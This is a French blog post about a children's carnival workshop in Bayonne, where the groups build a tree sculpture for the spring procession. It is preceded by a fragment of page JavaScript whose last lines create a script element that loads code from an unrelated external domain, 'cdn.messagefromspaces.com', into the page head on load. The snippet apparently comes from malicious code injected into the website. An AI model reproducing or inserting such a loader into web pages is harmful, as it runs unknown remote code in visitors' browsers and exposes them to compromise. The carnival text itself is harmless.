, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Atelier carnaval

Le thème du carnaval cette année rassemble tous les groupes d’enfants autour de la réalisation d’une sculpture symbolisant l’approche du printemps.

L’ARBRE.

Armature de l'arbre

Armature de l'arbre

Parce que celui-ci sans feuille l’hiver, sent monter en lui la sève nouvelle, montre avec les bourgeons l’éveil qui met la nature en émoi.

Au pied de l’arbre un personnage à l’écoute des bruissements. Premières agitations de ce monde onirique des petits êtres mystérieux et féériques de la forêt.

SAN PANTZAR, cet ogre que l’on juge d’avoir sans vergogne avalé les réserves de l’hiver, que l’on envoi au bûcher, sera remplacé dans l’atelier par la figure de la Nature dont on souhaite l’immortalité. La sauvegarde.

Les couleurs qui fleuriront notre cortège attiseront les palpitations de nos cœurs et agiteront nos pas vers une danse autour du totem dédié au CHANT DE LA TERRE.

Au fil des semaines la transformation opère sa magie. L’arbre lumineux attire le regard des passants de la rue. Nous serons prêts, le samedi 20 février, pour entrer dans le cortège des percussions (thème du carnaval de Bayonne cette année).

Cet article a été publié dans Daniela Maitia avec les mots-clefs : , , , . Bookmarker le permalien. Les commentaires et les trackbacks sont fermés.
  • Recherche par mots-clefs